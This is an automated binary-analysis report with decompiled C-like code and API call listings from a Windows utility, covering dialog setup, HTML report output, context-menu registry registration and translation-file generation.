                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t88;
                                                                                                                				void* _t108;
                                                                                                                				void* _t113;
                                                                                                                				void* _t119;
                                                                                                                				void* _t121;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				void* _t134;
                                                                                                                
                                                                                                                				_t113 = _t108;
                                                                                                                				E00403B3C(_t113);
                                                                                                                				E00403B16(_t113);
                                                                                                                				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				 *_t124 = 0x3ea;
                                                                                                                				E0040AD85(GetDlgItem(??, ??));
                                                                                                                				 *_t124 = 0x3f1;
                                                                                                                				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                                				_t134 = _t124 + 0x78;
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                                				_t119 = 1;
                                                                                                                				do {
                                                                                                                					_t17 = _t119 + 0x280; // 0x281
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t119 = _t119 + 1;
                                                                                                                				} while (_t119 <= 9);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                				_t121 = 1;
                                                                                                                				do {
                                                                                                                					_t21 = _t121 + 0x294; // 0x295
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t121 = _t121 + 1;
                                                                                                                				} while (_t121 <= 3);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                				_t122 = 0;
                                                                                                                				do {
                                                                                                                					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t122 = _t122 + 1;
                                                                                                                				} while (_t122 <= 0xd);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                				_t123 = 0;
                                                                                                                				do {
                                                                                                                					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t123 = _t123 + 1;
                                                                                                                					_t143 = _t123 - 3;
                                                                                                                				} while (_t123 < 3);
                                                                                                                				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                				E00403EC3(GetDlgItem, _t113);
                                                                                                                				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				_t88 = E00402D78(_t113, _t143);
                                                                                                                				E00402BEE(_t113);
                                                                                                                				return _t88;
                                                                                                                			}
















                                                                                                                0x00403e22
                                                                                                                0x00403e26
                                                                                                                0x00403e28
                                                                                                                0x00403e29
                                                                                                                0x00403e39
                                                                                                                0x00403e3e
                                                                                                                0x00403e41
                                                                                                                0x00403e42
                                                                                                                0x00403e51
                                                                                                                0x00403e55
                                                                                                                0x00403e57
                                                                                                                0x00403e58
                                                                                                                0x00403e68
                                                                                                                0x00403e6d
                                                                                                                0x00403e70
                                                                                                                0x00403e71
                                                                                                                0x00403e71
                                                                                                                0x00403e87
                                                                                                                0x00403e8d
                                                                                                                0x00403e9e
                                                                                                                0x00403ea6
                                                                                                                0x00403eaf
                                                                                                                0x00403ebc

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void _v138;
                                                                                                                				long _v140;
                                                                                                                				void _v242;
                                                                                                                				char _v244;
                                                                                                                				void _v346;
                                                                                                                				char _v348;
                                                                                                                				void _v452;
                                                                                                                				void _v962;
                                                                                                                				signed short _v964;
                                                                                                                				void* __esi;
                                                                                                                				void* _t87;
                                                                                                                				wchar_t* _t109;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t153;
                                                                                                                				intOrPtr* _t154;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t159;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t124 = __ebx;
                                                                                                                				_v964 = _v964 & 0x00000000;
                                                                                                                				memset( &_v962, 0, 0x1fc);
                                                                                                                				_t125 = 0x18;
                                                                                                                				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                				asm("movsw");
                                                                                                                				_t153 = 0;
                                                                                                                				_v244 = 0;
                                                                                                                				memset( &_v242, 0, 0x62);
                                                                                                                				_v348 = 0;
                                                                                                                				memset( &_v346, 0, 0x62);
                                                                                                                				_v140 = 0;
                                                                                                                				memset( &_v138, 0, 0x62);
                                                                                                                				_t161 = _t159 + 0x3c;
                                                                                                                				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                				if(_t87 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0x32);
                                                                                                                					_push( &_v244);
                                                                                                                					L0040B1EC();
                                                                                                                					_t161 = _t161 + 0x18;
                                                                                                                				}
                                                                                                                				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                				_v8 = _t153;
                                                                                                                				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                					while(1) {
                                                                                                                						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                						_v12 = _t156;
                                                                                                                						_t157 = _t156 * 0x14;
                                                                                                                						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                							wcscpy( &_v140, L" nowrap");
                                                                                                                						}
                                                                                                                						_v32 = _v32 | 0xffffffff;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _t153;
                                                                                                                						_t154 = _a8;
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                						E0040ADC0(_v32,  &_v348);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                						} else {
                                                                                                                							_push( *(_t157 + _v16 + 0x10));
                                                                                                                							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                							_push(0x2000);
                                                                                                                							_push( *(_t124 + 0x68));
                                                                                                                							L0040B1EC();
                                                                                                                							_t161 = _t161 + 0x14;
                                                                                                                						}
                                                                                                                						_t109 =  *(_t124 + 0x64);
                                                                                                                						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                							wcscat(_t109, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                						_push( &_v140);
                                                                                                                						_push( &_v348);
                                                                                                                						_push( *(_t124 + 0x68));
                                                                                                                						_push( &_v244);
                                                                                                                						_push( &_v452);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t161 = _t161 + 0x28;
                                                                                                                						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t153 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L14:
                                                                                                                				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				long _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				char _v2564;
                                                                                                                				char _v35332;
                                                                                                                				char _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				E0040B550(0x8a00, __ecx);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x1fc);
                                                                                                                				_v1540 = 0;
                                                                                                                				memset( &_v1538, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t79 = _t78 + 0x24;
                                                                                                                				if(_a20 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t79 = _t79 + 0x18;
                                                                                                                				}
                                                                                                                				if(_a24 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                					_push(L"<font color=\"%s\">");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v1540);
                                                                                                                					L0040B1EC();
                                                                                                                					wcscpy( &_v1028, L"</font>");
                                                                                                                					_t79 = _t79 + 0x20;
                                                                                                                				}
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                				_push(0x3fff);
                                                                                                                				_push( &_v35332);
                                                                                                                				L0040B1EC();
                                                                                                                				_t80 = _t79 + 0x10;
                                                                                                                				E00407343(_a4, _a8,  &_v35332);
                                                                                                                				_t51 = _a16;
                                                                                                                				if(_t51 > 0) {
                                                                                                                					_t73 = _a12 + 4;
                                                                                                                					_a20 = _t51;
                                                                                                                					do {
                                                                                                                						_v516 = 0;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						_t54 =  *_t73;
                                                                                                                						_t81 = _t80 + 0xc;
                                                                                                                						if( *_t54 == 0) {
                                                                                                                							_v516 = 0;
                                                                                                                						} else {
                                                                                                                							_push(_t54);
                                                                                                                							_push(L" width=\"%s\"");
                                                                                                                							_push(0xff);
                                                                                                                							_push( &_v516);
                                                                                                                							L0040B1EC();
                                                                                                                							_t81 = _t81 + 0x10;
                                                                                                                						}
                                                                                                                						_push( &_v1028);
                                                                                                                						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                						_push( &_v1540);
                                                                                                                						_push( &_v516);
                                                                                                                						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                						_push(0x3fff);
                                                                                                                						_push( &_v35332);
                                                                                                                						L0040B1EC();
                                                                                                                						_t80 = _t81 + 0x1c;
                                                                                                                						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                						_t73 = _t73 + 8;
                                                                                                                						_t36 =  &_a20;
                                                                                                                						 *_t36 = _a20 - 1;
                                                                                                                					} while ( *_t36 != 0);
                                                                                                                					return _t61;
                                                                                                                				}
                                                                                                                				return _t51;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v32;
                                                                                                                				void _v2078;
                                                                                                                				signed int _v2080;
                                                                                                                				void _v4126;
                                                                                                                				char _v4128;
                                                                                                                				void _v6174;
                                                                                                                				char _v6176;
                                                                                                                				void _v8222;
                                                                                                                				char _v8224;
                                                                                                                				signed int _t49;
                                                                                                                				short _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				int _t73;
                                                                                                                				intOrPtr _t78;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				E0040B550(0x201c, __ecx);
                                                                                                                				_t73 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                					L6:
                                                                                                                					return _t73;
                                                                                                                				}
                                                                                                                				_v6176 = 0;
                                                                                                                				memset( &_v6174, 0, 0x7fe);
                                                                                                                				_t78 = _a4;
                                                                                                                				_push(_t78 + 0x20a);
                                                                                                                				_push(_t78);
                                                                                                                				_push(L"%s\\shell\\%s\\command");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v6176);
                                                                                                                				L0040B1EC();
                                                                                                                				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t73 =  ~_t49 + 1;
                                                                                                                					RegCloseKey(_v12);
                                                                                                                					_v2080 = _v2080 & 0x00000000;
                                                                                                                					memset( &_v2078, 0, 0x7fe);
                                                                                                                					E00404AD9( &_v2080);
                                                                                                                					if(_v2078 == 0x3a) {
                                                                                                                						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                						_v32 = _t55;
                                                                                                                						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                						_v28 = _t56;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						_v32 = _v2080;
                                                                                                                						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                							_v4128 = 0;
                                                                                                                							memset( &_v4126, 0, 0x7fe);
                                                                                                                							_v8224 = 0;
                                                                                                                							memset( &_v8222, 0, 0x7fe);
                                                                                                                							_push(_a4 + 0x20a);
                                                                                                                							_push(_a4);
                                                                                                                							_push(L"%s\\shell\\%s");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v8224);
                                                                                                                							L0040B1EC();
                                                                                                                							_push( &_v2080);
                                                                                                                							_push(L"\"%s\",0");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v4128);
                                                                                                                							L0040B1EC();
                                                                                                                							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				RegCloseKey(_v8);
                                                                                                                				goto L6;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                				void _v530;
                                                                                                                				char _v532;
                                                                                                                				void _v1042;
                                                                                                                				long _v1044;
                                                                                                                				long _v4116;
                                                                                                                				char _v5164;
                                                                                                                				void* __edi;
                                                                                                                				void* _t27;
                                                                                                                				void* _t38;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				E0040B550(0x142c, __ecx);
                                                                                                                				_v1044 = 0;
                                                                                                                				memset( &_v1042, 0, 0x1fc);
                                                                                                                				_v532 = 0;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_pop(_t44);
                                                                                                                				E00405AA7( &_v5164);
                                                                                                                				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                				_t61 = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					wcscpy( &_v1044,  &_v4116);
                                                                                                                					_pop(_t44);
                                                                                                                				}
                                                                                                                				wcscpy(0x40fb90, _a8);
                                                                                                                				wcscpy(0x40fda0, L"general");
                                                                                                                				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                				wcscpy(0x40fda0, L"strings");
                                                                                                                				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                				return _t38;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
